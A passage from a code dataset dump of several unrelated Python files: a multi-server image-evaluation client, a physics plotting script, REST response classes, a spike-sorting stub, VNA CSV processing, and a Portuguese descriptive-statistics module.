self.evaluation_machines_ports.append(self.server_ports_list[i])\n\n if self.settings.verbosity >= 1:\n print(\"attention_machines_ports\", self.attention_machines_ports)\n print(\"evaluation_machines_ports\", self.evaluation_machines_ports)\n\n def evaluate_crops_on_server(self, crops, ids_of_crops, type):\n # will be more advanced\n # like splitting to all available servers\n N = self.number_of_server_machines\n\n if N > 1:\n #print(\"ON MULTIPLE MACHINES\", N, \"(att:\",len(self.attention_machines_ports),\", eval:\",len(self.evaluation_machines_ports),\")\")\n result, times_encode, times_eval, times_decode, times_transfer = self.split_across_list_of_servers(crops, ids_of_crops, type)\n else:\n port = self.server_ports_list[0]\n result,time_Encode, time_Evaluation, time_Decode, time_Transfer = self.direct_to_server(crops, ids_of_crops, port)\n times_encode = [time_Encode]\n times_eval = [time_Evaluation]\n times_decode = [time_Decode]\n times_transfer = [time_Transfer]\n return result, times_encode, times_eval, times_decode, times_transfer\n\n def split_across_list_of_servers(self, crops, ids_of_crops, type):\n\n # Scheduling task, idea/heuristic:\n #\n # hold two lists of servers reserved for two tasks:\n # - regular evaluation\n # - precomputing (attention) evaluation in advance\n # simple version, from N servers:\n # - 1 precomputing // 
scale -> 2 ...\n # - N-1 final evaluations // scale -> N-2 ...\n # if N=1, then use the direct method\n #\n # we want to prevent:\n # a.) precomputing slowing down real evaluation\n # b.) precomputing not being done fast enough\n\n ports_list = []\n if self.settings.precompute_attention_evaluation:\n if type == 'attention':\n ports_list = self.attention_machines_ports\n elif type == 'evaluation':\n ports_list = self.evaluation_machines_ports\n else:\n ports_list = self.server_ports_list\n\n shuffle(ports_list)\n\n N = len(ports_list)\n C = len(crops)\n\n if self.settings.verbosity >= 3:\n print(\"[Connection to multiple servers] We can split\",C,\"crops on\",N,\" machines as \",(C/N),\" per each (type\",type,\")\")\n print(\"all ids:\",ids_of_crops)\n\n results = [[]]*(max(ids_of_crops)+1)\n threads = []\n\n id_of_indices_0_to_C = range(0,C)\n id_splits = np.array_split(id_of_indices_0_to_C, N)\n #print(\"id_splits\",id_splits)\n\n num_of_actual_threads = 0\n for ids in id_splits:\n if len(ids)>0:\n num_of_actual_threads+=1\n\n times_eval = [[]]*(num_of_actual_threads)\n times_transfer = [[]]*(num_of_actual_threads)\n times_encode = [[]]*(num_of_actual_threads)\n times_decode = [[]]*(num_of_actual_threads)\n\n #print(\"corresponds to crops\", np.array_split(ids_of_crops, N))\n\n for i,ids in enumerate(id_splits):\n if len(ids)==0:\n continue\n\n sub_crops = [crops[id] for id in ids]\n sub_ids = [ids_of_crops[id] for id in ids]\n port = ports_list[i]\n\n if self.settings.verbosity >= 3:\n print(port, self.server_names[port], \"> with len=\",len(sub_crops), \"of ids:\", sub_ids)\n\n # start a new thread to call the API\n t = Thread(target=self.eval_subset_and_save_to_list, args=(sub_crops, sub_ids, port, results, i, times_eval, times_transfer, times_encode, times_decode))\n t.daemon = True\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()\n\n if self.settings.verbosity >= 3:\n print(\"All threads finished, assuming we have all the ids from\", ids_of_crops)\n\n results_tmp = []\n\n for i,r in enumerate(results):\n if len(r) > 0:\n results_tmp.append(r)\n\n results = results_tmp\n\n if self.settings.verbosity >= 3:\n print(\"results = \", results)\n\n return results, times_encode, times_eval, times_decode, times_transfer\n\n # thread function\n def eval_subset_and_save_to_list(self, crops, ids_of_crops, port, results, ith, times_eval, times_transfer, times_encode, times_decode):\n evaluation,time_Encode, time_Evaluation, time_Decode, time_Transfer = self.direct_to_server(crops, ids_of_crops, port)\n times_eval[ith] = time_Evaluation\n times_transfer[ith] = time_Transfer\n times_encode[ith] = time_Encode\n times_decode[ith] = time_Decode\n #print(\"times[ith]\", ith, \" = \", time)\n\n for uid,bbox in evaluation:\n results[uid] = [uid,bbox]\n #results[uid] = [uid]\n\n self.history.report_evaluation_per_specific_server(self.server_names[port], time_Encode, time_Evaluation, time_Decode, time_Transfer)\n\n\n def direct_to_server(self, crops, ids_of_crops, port):\n\n EVALUATE_API_URL = \"http://localhost:\" + port + \"/evaluate_image_batch\"\n\n number_of_images = len(crops)\n\n payload = {}\n\n\n t0 = timer()\n encoded_images = self.pool.map(lambda i: (\n cv2.imencode('.jpg', i)[1].tostring()\n ), crops)\n\n for i in range(number_of_images):\n #image = crops[i]\n #image_enc = cv2.imencode('.jpg', image)[1].tostring()\n image_enc = encoded_images[i]\n id = ids_of_crops[i]\n payload[str(id)] = image_enc\n\n \"\"\"\n if self.settings.opencv_or_pil != 'PIL':\n # TODO: MAYBE INEFFICIENT, 
back to PIL for sending\n                image = Image.fromarray(image)\n\n            memory_file = BytesIO()\n            image.save(memory_file, \"JPEG\")\n            memory_file.seek(0)\n\n            id = ids_of_crops[i]\n            payload[str(id)] = memory_file\n        \"\"\"\n        t1 = timer()\n        time_Encode = t1-t0\n        if self.settings.verbosity >= 2:\n            print(number_of_images,\"Image(s) encoding (with\",self.settings.opencv_or_pil,\") took = \", time_Encode, \"(during the eval)\")\n\n        if number_of_images == 0:\n            print(\"Careful, 0 images, don't send.\")\n            return [], 0, 0, 0, 0\n\n        start = timer()\n        # submit the request\n        try:\n            r = requests.post(EVALUATE_API_URL, files=payload).json()\n        except Exception as e:\n            print(\"CONNECTION TO SERVER \",EVALUATE_API_URL,\" FAILED - return to backup local evaluation?\")\n            print(\"Exception:\", e)\n            raise\n\n        end = timer()\n        time_EvaluationAndTransfer = end - start\n        if self.settings.verbosity >= 2:\n            print(\"Server on port\",port,\" evaluated\", len(crops), \"crops. Time:\", time_EvaluationAndTransfer, \"Request data:\", r)\n\n        uids = r[\"uids\"]\n        bboxes = r[\"bboxes\"]\n\n        time_Evaluation = float(r[\"time_pure_eval\"])\n        time_Decode = float(r[\"time_pure_decode\"])\n        time_Transfer = time_EvaluationAndTransfer - time_Evaluation - time_Decode\n\n        #print(\"uids\", uids)\n        #print(\"bboxes len\", len(bboxes))\n        # currently UIDS are ordered, this will not be true of multiple servers though\n\n        evaluation = []\n        for i,bbox in enumerate(bboxes):\n            evaluation.append([int(uids[i]), bbox])\n\n        # We want evaluation in format:\n        # array of crops in order by coordinates_id\n        # each holds id and array of dictionaries for each bbox {} keys label, confidence, topleft, bottomright\n        #print(\"evaluation\", evaluation)\n\n        return evaluation, time_Encode, time_Evaluation, time_Decode, time_Transfer\n\n","sub_path":"video_parser_v2/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"135950348","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Walter\r\n\"\"\"\r\n\"\"\"\r\nCreation of a graph based on the itinerary table,\r\nusing list-type containers,\r\nfound on page 41 of the Texto del Estudiante de Física 2018.\r\n\"\"\"\r\n#import numpy as np #library useful for math calculations (http://www.numpy.org/)\r\nimport matplotlib.pyplot as plt #library useful for making plots (https://matplotlib.org/gallery.html)\r\nimport webbrowser #open files from the directory\r\n\r\n#Itinerary table\r\n\r\ntiempo = [0,1,2,3]#lists\r\nposicion = [0,5,10,15]#lists\r\n\r\n#Plot of the table\r\nfig = plt.figure() #build the figure\r\nax = fig.add_subplot(111) #build the subplot\r\nxs = tiempo #x axis\r\nys = posicion #y axis\r\n#Graph title\r\nplt.title(\"Gráfico Posición vs Tiempo \\n Movimiento Rectilíneo Uniforme\")\r\n#Build the graph\r\nax.plot(xs, ys)\r\n#Axis limits\r\nax.set_ylim(ymin=0)\r\nax.set_xlim(xmin=0)\r\n#Axis labels\r\nplt.ylabel(\"Posicion [m]\")\r\nplt.xlabel(\"Tiempo[s]\")\r\n#Save image\r\nplt.savefig(\"Grafico MRU-lista.png\")\r\n#show the image\r\nplt.show()\r\n#open the image from the file\r\nwebbrowser.open(\"Grafico MRU-lista.png\")\r\n\r\n\r\n","sub_path":"Grafico MRU-Lista.py","file_name":"Grafico MRU-Lista.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"220780680","text":"from rest_framework.response import Response\n\n\nclass 
ResponseOk(Response):\n\n status_code = 200\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 1, \"message\": \"OK\", \"status\": 200}\n if isinstance(data, str):\n data = {\"success\": 1, \"message\": data, \"status\": 200}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 1\n if \"status\" not in data.keys():\n data['status'] = 200\n if \"message\" not in data.keys():\n data['message'] = \"OK\"\n super(ResponseOk, self).__init__(data, status=200)\n\n\nclass ResponseNotFound(Response):\n\n status_code = 404\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Not found\", \"status\": 404}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 404}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 404\n if \"error\" not in data.keys():\n data['error'] = \"Not found\"\n super(ResponseNotFound, self).__init__(data, status=404)\n\n\nclass ResponseInternalServerError(Response):\n\n status_code = 500\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Internal Server Error\", \"status\": 500}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 500}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 500\n if \"error\" not in data.keys():\n data['error'] = \"Internal Server Error\"\n super(ResponseInternalServerError, self).__init__(data, status=500)\n\n\nclass ResponseForbidden(Response):\n\n status_code = 403\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Forbidden\", \"status\": 403}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 403}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 403\n if \"error\" not in data.keys():\n data['error'] = \"Forbidden\"\n super(ResponseForbidden, self).__init__(data, status=403)\n\n\nclass ResponseNotAllowed(Response):\n\n status_code = 405\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Not Allowed\", \"status\": 405}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 405}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 405\n if \"error\" not in data.keys():\n data['error'] = \"Not Allowed\"\n super(ResponseNotAllowed, self).__init__(data, status=405)\n\n\nclass ResponseBadRequest(Response):\n\n status_code = 400\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Bad Request\", \"status\": 400}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 400}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 400\n if \"error\" not in data.keys():\n data['error'] = \"Bad Request\"\n super(ResponseBadRequest, self).__init__(data, status=400)\n\n\nclass ResponseUnauthorized(Response):\n\n status_code = 401\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Unauthorized\", \"status\": 401}\n if isinstance(data, str):\n data = 
{\"success\": 0, \"error\": data, \"status\": 401}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 401\n if \"error\" not in data.keys():\n data['error'] = \"Unauthorized\"\n super(ResponseUnauthorized, self).__init__(data, status=401)\n","sub_path":"utils/Response.py","file_name":"Response.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"423114943","text":"\nimport numpy as np\nfrom os.path import join\nimport pandas as pd\n\nfrom BrainDataAnalysis.Spike_Sorting import positions_on_probe as spp\nfrom spikesorting_tsne_guis import clean_kilosort_templates as clean\nfrom spikesorting_tsne import preprocessing_kilosort_results as preproc_kilo\n\nfrom ExperimentSpecificCode._2018_2019_Neuroseeker_Paper._256ch_Probe.St2.All_Channels import constants as const\n\n\nfrom spikesorting_tsne import preprocessing_kilosort_results as preproc_kilo, io_with_cpp as tsne_io, tsne as tsne, \\\n visualization as viz\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------------------------------\n# STEP 1: RUN KILOSORT ON THE DATA\n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"ExperimentSpecificCode/_2018_2019_Neuroseeker_Paper/_256ch_Probe/St2/All_Channels/spikesorting.py","file_name":"spikesorting.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"563634067","text":"import libreria\ndef agregar_mes():\n input(\"Agregar mes: \")\n print(\"Se ingreso mes\")\n\ndef agregar_dia():\n input(\"Agregar dia: \")\n print(\"Se ingreso dia\")\n\nopc=0\nmax=3\nwhile(opc!=max):\n print(\"######### MENU ##########\")\n print(\"# 1. agregar mes #\")\n print(\"# 2. agregar dia #\")\n print(\"# 3. 
salir          #\")\n    print(\"#########################\")\n\n    opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n\n    if(opc==1):\n        agregar_mes()\n    if(opc==2):\n        agregar_dia()\n\nprint(\"Programa finalizado\")\n# end_menu\n","sub_path":"palacios/app9.py","file_name":"app9.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"249119588","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\n#Need the pandas library\n\nBoard = \"6003\"\nSigOrTrig = \"SIG\"\t\n\ndef main():\n\n\t#get the first file of interest\n\n\tChannels = [0,1,2,3] #what channels?\n\t#AttenuationSettings = [\"010\",\"020\",\"030\",\"060\",\"090\",\"120\"] #what attenuation settings?\n\t#Temperatures = [\"N10\", \"P00\", \"P10\", \"P20\", \"P30\"] #what temperatures?\n\tAttenuationSettingsSig = [\"000\",\"008\",\"016\",\"024\",\"032\",\"040\",\"048\",\"056\",\"064\",\"072\",\"080\",\"088\",\"096\",\"104\",\"112\",\"120\"] #what attenuation settings?\n\tatt_trig=\"000\"\n\tTemperatures = [\"P30\"] #what temperatures?\n\t\n\tfor chan in Channels:\n\t\tfor att_sig in AttenuationSettingsSig:\n\t\t\tfor temp in Temperatures:\n\t\t\t\t#print \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11MAG.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11MagFile = \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11MAG.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11PhaseFile = \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11PHS.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11Mag = pd.read_csv(S11MagFile,skiprows=3) #skip the first three rows\n\t\t\t\tS11Mag.drop(S11Mag.columns[2], axis=1,inplace=True) #drop the third column\n\t\t\t\tS11Phs = pd.read_csv(S11PhaseFile,skiprows=3)\n\t\t\t\tS11Phs.drop(S11Phs.columns[2], axis=1,inplace=True)\n\t\t\t\tS11Mag.columns=['Frequency','|S11|']\n\t\t\t\tS11Phs.columns=['Frequency',' maior:\n\t\t\tmaior = dado.populacao\n\treturn maior\n\ndef getTotalSize(lista_municipios):\n\treturn len(lista_municipios)\n\ndef getAmplitude(lista_municipios):\n\t## the range (amplitude) is the distance between the smallest and the largest value of a sample\n\treturn (getValorMaximo(lista_municipios) - getValorMinimo(lista_municipios))\n\ndef getMedia(lista_municipios):\n\t## The mean is given by the total sum of the values divided by their count\n\t## this function returns the arithmetic mean of the sample's population values\n\tnumero_total_dados = len(lista_municipios) \n\tsoma_total = 0\n\n\tfor municipio in lista_municipios:\n\t\tsoma_total += municipio.populacao\n\t\n\t## the mean is the total sum of the values divided by their count\n\tmedia = soma_total / numero_total_dados\n\treturn media\n\ndef getMediaAgrupados(lista, lista_municipios):\n\t## this part computes the mean of the grouped data,\n\t## which consists of the sum of each class midpoint multiplied by the class's\n\t## absolute frequency, divided by the total number of data points\n\n\tsoma_pontos_medios = 0.0\n\tfor dicio in lista:\n\t\tsoma_pontos_medios += dicio['ponto_medio']*dicio['fi']\n\tmedia = soma_pontos_medios / getTotalSize(lista_municipios)\n\n\treturn media\n\ndef getMediana(lista_municipios):\n\t## The median is the value separating the upper half from the lower half of a sample, a population or a probability distribution.\n\t## If there is an even number of observations, there is no single middle value. 
Then the median is defined as the mean of the two middle values.\n\t## if the total number of samples modulo 2 is non-zero, we return the middle value...\n\t## this function returns the median population value of the sample\n\n\tif len(lista_municipios)%2 != 0: \n\t\tvalor_meio = lista_municipios[len(lista_municipios)//2].populacao\n\t\treturn valor_meio\n\n\t## if the total number of samples modulo 2 is zero...\n\telse: \n\t\tvalor_meio_1 = lista_municipios[(len(lista_municipios)//2)-1].populacao\n\t\tvalor_meio_2 = lista_municipios[len(lista_municipios)//2].populacao\n\t\tmediana = (valor_meio_1+valor_meio_2) // 2\n\t\treturn mediana\n\ndef getMedianaAgrupados(lista, lista_municipios):\n\t## this part of the code computes the median of the grouped data\n\t## first we find the class whose cumulative frequency reaches the middle position of the data\n\n\tqtd_media_dados = getTotalSize(lista_municipios) / 2\n\n\tfor dicio in lista:\n\n\t\tif dicio['Fi'] >= qtd_media_dados:\n\t\t## the formula for the median of grouped data is:\n\t\t#\n\t\t# Md = Li + (P - fai) x (h/fm)\n\t\t#\n\t\t##where Li is the lower limit of the class containing the median, P is the position of the median in\n\t\t##the whole data set (called the rank of the median), fai is the cumulative frequency up to the\n\t\t##class before the one containing the median, h is the width of the class interval and fm is the\n\t\t##frequency of the class containing the median. \n\t\t## to match the formula, and for didactic reasons, we assign the variables\n\t\t\tLi = dicio['limite_inferior']\n\t\t\tfai = dicio['Fi'] - dicio['fi']\n\t\t\tfm = dicio['fi']\n\t\t\th = dicio['limite_superior'] - dicio['limite_inferior']\n\t\t\tP = qtd_media_dados\n\n\t\t\tmediana = Li + (P - fai) * (h/fm)\n\n\t\t\treturn mediana\n\ndef getModa(lista_municipios):\n\t## The mode is the value that appears most often in a data set.\n\t## this function returns a dictionary with the modal values {populacao:repeticao}\n\n\trelacao_valores_x_quantidade = {}\n\t\n\t## first, we build the mapping between the number of inhabitants and how many municipalities have it\n\tfor municipio in lista_municipios:\n\t\tif str(municipio.populacao) not in relacao_valores_x_quantidade:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): 1})\n\t\telse:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): relacao_valores_x_quantidade[str(municipio.populacao)] + 1})\t\n\n\t## next, we select the number of inhabitants that repeats the most in the mapping \n\tmaior_repeticao = 0\n\tfor key in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[key] > maior_repeticao:\n\t\t\tmaior_repeticao = relacao_valores_x_quantidade[key]\t\n\n\t## we add the most repeated values to the dictionary of modes\n\tmodas = {}\n\tfor valor in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[valor] == maior_repeticao:\n\t\t\tmodas.update({valor : relacao_valores_x_quantidade[valor]})\n\treturn modas\t\n\ndef getModaAgrupados(lista,lista_municipios):\n\t## the mode of the grouped data is the midpoint of the class with the highest absolute frequency\n\n\tmaior_frequencia = 0.0\n\tmoda = 0.0\n\n\tfor dicio in lista:\n\t\t## first we find the class with the highest absolute frequency\n\t\tif dicio['fi'] > maior_frequencia:\n\t\t\tmaior_frequencia = dicio['fi']\n\t\t## then the class midpoint is assigned to the mode\n\t\t\tmoda = 
\ndef getModa(lista_municipios):\n\t## the mode is the value that appears most often in a data set.\n\t## this function returns a dict with the modal values {populacao: repeticoes}\n\n\trelacao_valores_x_quantidade = {}\n\t\n\t## first, map each population figure to the number of municipalities that have it\n\tfor municipio in lista_municipios:\n\t\tif str(municipio.populacao) not in relacao_valores_x_quantidade:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): 1})\n\t\telse:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): relacao_valores_x_quantidade[str(municipio.populacao)] + 1})\t\n\n\t## next, find the population figure that repeats the most\n\tmaior_repeticao = 0\n\tfor key in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[key] > maior_repeticao:\n\t\t\tmaior_repeticao = relacao_valores_x_quantidade[key]\t\n\n\t## finally, collect the values with the highest repeat count\n\tmodas = {}\n\tfor valor in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[valor] == maior_repeticao:\n\t\t\tmodas.update({valor : relacao_valores_x_quantidade[valor]})\n\treturn modas\t\n\ndef getModaAgrupados(lista,lista_municipios):\n\t## the mode of grouped data is the midpoint of the class with the highest absolute frequency\n\n\tmaior_frequencia = 0.0\n\tmoda = 0.0\n\n\tfor dicio in lista:\n\t\t## find the class with the highest absolute frequency\n\t\tif dicio['fi'] > maior_frequencia:\n\t\t\tmaior_frequencia = dicio['fi']\n\t\t\t## and take that class's midpoint as the mode\n\t\t\tmoda = dicio['ponto_medio']\n\treturn moda\n\ndef getVariancia(lista_municipios):\n\t## the variance is the sum of squared deviations divided by the number of observations (minus one for the sample variance).\n\t## first we take each value's difference from the mean and square the result\n\t## this function returns a dict of variances {tipo_variancia: valor}\n\tvariancias = {}\n\tsoma_dos_quadrados = 0\n\tmedia = getMedia(lista_municipios)\n\n\tfor municipio in lista_municipios:\n\n\t\t## subtract the value from the mean\n\t\tvalor = media - int(municipio.populacao)\n\n\t\t## then square it\n\t\tvalor = valor**2\n\n\t\t## and add it to the sum of squares:\n\t\tsoma_dos_quadrados += valor\n\t\n\t## with the sum of squares, divide by the number of samples minus 1 (sample variance)\n\tvariancia_amostral = soma_dos_quadrados / (len(lista_municipios) - 1)\n\tvariancias.update({\"variancia_amostral\":variancia_amostral})\n\n\t## with the sum of squares, divide by the number of samples (population variance)\n\tvariancia_populacional = soma_dos_quadrados / (len(lista_municipios))\n\tvariancias.update({\"variancia_populacional\":variancia_populacional})\n\n\treturn variancias\n\ndef getVarianciaAgrupados(lista, lista_municipios):\n\t## the variance of grouped data is the sum over classes of (class midpoint minus the grouped mean) squared,\n\t## weighted by the class's absolute frequency, divided by the accumulated absolute frequency\n\t##\n\n\tmedia_agrupados = getMediaAgrupados(lista, lista_municipios)\n\tvariancia = 0.0\n\tabsoluta = 0.0\n\n\tfor dicio in lista:\n\t\tponto_medio = dicio['ponto_medio']\n\t\tfrequencia_absoluta = dicio['fi']\t\n\t\tvariancia += ((ponto_medio - media_agrupados)**2)* frequencia_absoluta\n\t\tabsoluta+= frequencia_absoluta\n\tvariancia /= absoluta\n\treturn variancia\n
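The sample/population split above can be sanity-checked against the standard library; a small self-contained check on made-up numbers:

```python
import statistics

data = [2, 4, 4, 4, 5, 5, 7, 9]          # hypothetical sample
mean = sum(data) / len(data)              # 5.0
ss = sum((x - mean) ** 2 for x in data)   # sum of squared deviations = 32
print(ss / (len(data) - 1), statistics.variance(data))   # sample variance, n-1 denominator
print(ss / len(data), statistics.pvariance(data))        # population variance, n denominator
```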
\ndef getDesvioPadrão(lista_municipios):\n\t## the standard deviation measures the \"error\" we would make in a data set if we replaced each collected value with the arithmetic mean.\n\t## it is reported next to the arithmetic mean and tells how \"reliable\" that mean is. It is usually presented as:\n\t## arithmetic mean (x) ± standard deviation (dp)\n\t## the standard deviation is the positive square root of the variance.\n\t## this function returns a dict of standard deviations {tipo_desvio: valor}\n\tdesvios = {}\n\tvariancias = getVariancia(lista_municipios)\n\n\t## square root of the sample variance (sample standard deviation)\n\tdesvio_padrao_amostral = math.sqrt(variancias[\"variancia_amostral\"])\n\tdesvios.update({\"desvio_padrao_amostral\" : desvio_padrao_amostral})\n\n\t## square root of the population variance (population standard deviation)\n\tdesvio_padrao_populacional = math.sqrt(variancias[\"variancia_populacional\"])\n\tdesvios.update({\"desvio_padrao_populacional\" : desvio_padrao_populacional})\n\n\treturn desvios\n\ndef getCoeficienteDeVariacao(lista_municipios):\n\t## the coefficient of variation (CV) is defined as the ratio of the standard deviation to the mean \n\t## this function returns a dict of coefficients {tipo_coeficiente: valor}\n\tcoeficientes = {}\n\n\tmedia = getMedia(lista_municipios)\n\tdesvios = getDesvioPadrão(lista_municipios)\n\n\t## sample coefficient of variation\n\tcoeficiente_amostral = desvios[\"desvio_padrao_amostral\"]/media\n\tcoeficientes.update({\"coeficiente_variacao_amostral\":coeficiente_amostral})\n\n\t## population coefficient of variation\n\tcoeficiente_populacional = desvios[\"desvio_padrao_populacional\"]/media\n\tcoeficientes.update({\"coeficiente_variacao_populacional\":coeficiente_populacional})\n\n\treturn coeficientes\n\n## helpers for building the frequency-distribution table\ndef getTabelaFrequencia(lista_municipios):\n\t## base rows of the table, to be filled with the data\n\tvalores = []\n\tvalores1 = []\n\tvalores2 = []\n\tfrequencia_acumulada = 0.0\n\tfrequencia_acumulada_relativa = 0.0\n\n\t## NUMBER OF CLASSES FOR THE FREQUENCY DISTRIBUTION\n\t\n\t## width of each class interval\n\tTAMANHO_CLASSES = getAmplitude(lista_municipios) / NUMERO_CLASSES\n\n\t## the first class starts at the smallest value\n\tvalor_minimo_classe = getValorMinimo(lista_municipios)\n\n\t## generate one table row per class, with that class's figures\n\t\n\tfor i in range (0, NUMERO_CLASSES):\n\t\t\n\t\t## derive the class's upper bound from its lower bound\n\t\tvalor_maximo_classe = valor_minimo_classe + TAMANHO_CLASSES\n\t\tponto_medio_classe = (valor_minimo_classe+valor_maximo_classe)/2\n\t\t\n\t\tfrequencia_absoluta = getQuantityIntervalBetween(lista_municipios, valor_minimo_classe, valor_maximo_classe) # (fi)\n\t\tfrequencia_relativa = frequencia_absoluta / getTotalSize(lista_municipios) # (fri)\n\t\tfrequencia_acumulada += frequencia_absoluta # (Fi)\n\t\tfrequencia_acumulada_relativa += frequencia_relativa # (Fri)\n\n\t\tvalores1.append({\n\t\t\t'intervalo': \"%d - %d\" % (valor_minimo_classe, valor_maximo_classe),\n\t\t\t'ponto_medio': ponto_medio_classe,\n\t\t\t'fi': frequencia_absoluta,\n\t\t\t'fri': frequencia_relativa,\n\t\t\t'Fi': frequencia_acumulada,\n\t\t\t'Fri': frequencia_acumulada_relativa})\n\n\t\tvalores2.append({\n\t\t\t'limite_inferior': valor_minimo_classe,\n\t\t\t'limite_superior': valor_maximo_classe,\n\t\t\t'ponto_medio': ponto_medio_classe,\n\t\t\t'fi': frequencia_absoluta,\n\t\t\t'fri': frequencia_relativa,\n\t\t\t'Fi': frequencia_acumulada,\n\t\t\t'Fri': frequencia_acumulada_relativa})\n\n\t\t## advance the lower bound to the next class\n\t\tvalor_minimo_classe += TAMANHO_CLASSES\n\n\t## the two row lists are appended once, after all classes are built\n\tvalores.append(valores1)\n\tvalores.append(valores2)\n\treturn valores\n
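A compact illustration of the fi/fri/Fi/Fri bookkeeping above, on a made-up sample of ten values split into two classes (the values are chosen so that none lands exactly on a class boundary, since the interval test is inclusive on both ends):

```python
data = [1, 2, 2, 3, 4, 6, 7, 8, 8, 9]    # hypothetical sample, n = 10
n, lo = len(data), min(data)
width = (max(data) - min(data)) / 2       # amplitude / number of classes
Fi = Fri = 0.0
for _ in range(2):
    hi = lo + width
    fi = len([x for x in data if lo <= x <= hi])  # inclusive bounds, as above
    fri = fi / n
    Fi, Fri = Fi + fi, Fri + fri
    print("%g - %g  fi=%d  fri=%.2f  Fi=%g  Fri=%.2f" % (lo, hi, fi, fri, Fi, Fri))
    lo = hi
```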
\ndef generateTXTTabelaFrequencia(lista):\n\t## column widths; the 'limite_superior'/'limite_inferior' columns live in the second row list and are not printed here\n\tmaior_string = {'intervalo':0, 'ponto_medio':0, 'fi':0, 'fri':0, 'Fi':0, 'Fri':0}\n\tlista = lista[0]\n\n\tfor dicio in lista:\n\t\tfor key in dicio:\n\t\t\tif len(str(dicio[key])) > maior_string[key]:\n\t\t\t\tmaior_string.update({key:len(str(dicio[key]))})\n\n\ttabela = \"\"\n\tfor key in maior_string:\n\t\ttabela += \" %s%s\"%(key, \" \"*((maior_string[key])-len(key)+2))\n\ttabela+= \"\\n\"\n\n\tlinha = \"\"\n\tfor dicio in lista:\n\t\tfor key in dicio:\n\t\t\tlinha+=\" %s %s |\"%((dicio[key]), \" \"*(maior_string[key]-len(str(dicio[key]))))\n\t\tlinha+=\"\\n\"\n\t\ttabela+= linha\n\t\tlinha = \"\"\n\n\treturn tabela\n\ndef calculateValuesFromTabela(lista, lista_municipios):\n\tlista = lista[1]\n\n\t## grouped-data estimates, all derived from the helpers above\n\n\tmedia = getMediaAgrupados(lista, lista_municipios)\n\tmediana = getMedianaAgrupados(lista, lista_municipios)\n\tmoda = getModaAgrupados(lista, lista_municipios)\n\tvariancia = getVarianciaAgrupados(lista, lista_municipios)\n\n\tdesvio_padrao = math.sqrt(variancia)\n\tcoeficiente_de_variacao = desvio_padrao / media\n\n\treturn {'media': media,\n\t'mediana': mediana,\n\t'moda': moda,\n\t'variancia': variancia,\n\t'desvio_padrao': 